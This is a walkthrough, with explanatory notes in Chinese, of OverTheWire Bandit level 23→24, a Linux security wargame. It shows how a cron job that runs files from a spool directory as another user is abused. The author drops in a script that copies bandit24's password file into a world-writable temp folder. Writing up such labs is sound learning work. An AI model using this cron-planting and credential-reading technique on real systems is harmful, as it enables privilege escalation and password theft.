[OverTheWire] Bandit Level 23 → Level 24
Level Goal
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ */ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Commands you may need to solve this level
- chmod
- cron
- crontab
- crontab(5) (use “man 5 crontab” to access this)
My Answer (Step by step)
- 連線到伺服器並登入
ssh bandit23@bandit.labs.overthewire.org -p 2220
- 透過 cd 與 ls 指令前往 /etc/cron.d 目錄查看有哪些排程工作
cd /etc/cron.d
ls -al
根據指令結果,發現有一個檔案 cronjob_bandit24 名稱跟下一等級相關
- 透過 cat 指令將檔案 cronjob_bandit24 內容呈現出來
cat cronjob_bandit24
# @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
# * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
根據指令結果,發現此工作會執行 /usr/bin/cronjob_bandit24.sh
- 透過 cat 指令將 sh script 呈現出來
cat /usr/bin/cronjob_bandit24.sh
# #!/bin/bash
# myname=$(whoami)
# cd /var/spool/$myname/foo
# echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
# for i in * .*;
# do
# if [ "$i" != "." -a "$i" != ".." ];
# then
# echo "Handling $i"
# owner="$(stat --format "%U" ./$i)"
# if [ "${owner}" = "bandit23" ]; then
# timeout -s 9 60 ./$i
# fi
# rm -f ./$i
# fi
# done
根據指令結果,發現會執行並刪除所有在 /var/spool/bandit24/foo 的 script,所以我們可以在裡面寫一個獲得 bandit24 密碼的 script
- 透過 mktemp 與 cd 指令產生暫存資料夾並進入它
mktemp -d
cd /tmp/tmp.2ZUZlHBJ3d
- 透過 touch 指令產生腳本檔與密碼輸出檔,並透過 chmod 指令修改權限讓排程工作可以順利執行腳本與寫入密碼
touch a.sh
touch password.txt
chmod 777 -R /tmp/tmp.2ZUZlHBJ3d
- 透過 vim, vi, nano 等指令編輯 a.sh script
nano a.sh
a.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/tmp.2ZUZlHBJ3d/password.txt
- 透過 cp 指令將腳本檔放入指定目錄,並等待它執行
cp a.sh /var/spool/bandit24/foo/a.sh
- 約等一分鐘後,透過 cat 指令獲得 Level 24 密碼!
cat password.txt
